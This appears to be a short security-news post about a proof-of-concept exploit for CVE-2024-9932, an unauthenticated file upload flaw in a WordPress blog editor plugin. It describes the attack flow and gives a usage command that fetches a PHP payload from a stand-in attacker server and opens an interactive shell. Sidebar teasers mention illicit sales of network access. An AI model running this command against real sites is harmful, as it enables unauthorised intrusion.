CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE)

, and Dark Web Informer

January 27, 2026 . 8:04 PM

1 min read

GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932

This repository contains a proof-of-concept exploit for CVE-2024-9932, an unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).

What the script does

The script abuses a vulnerable REST endpoint to upload a remote PHP payload without authentication. Once uploaded, it reconstructs the final file location, detects the target operating system, and provides an interactive remote shell for command execution.

Usage

python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.

Notes

No authentication required (pre-auth / 0-click).

Latest

Tools

Bandit: A tool designed to find common security issues in Python code

, and Dark Web Informer

January 27, 2026

Paid Members Public

Initial Access

New Zealand E-commerce Store CMS Admin Access Allegedly for Sale with Active Payment Redirect

, and Dark Web Informer

January 27, 2026

Paid Members Public

Initial Access

Unauthorized RDP Access to Spanish Business Services Organization Allegedly for Sale with Domain Admin Privileges

, and Dark Web Informer

January 27, 2026

Paid Members Public

Articles

Daily Dose of Dark Web Informer - January 26th, 2026

, and Dark Web Informer

January 26, 2026

Paid Members Public

CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE)

What the script does

Usage

Notes

Related

Latest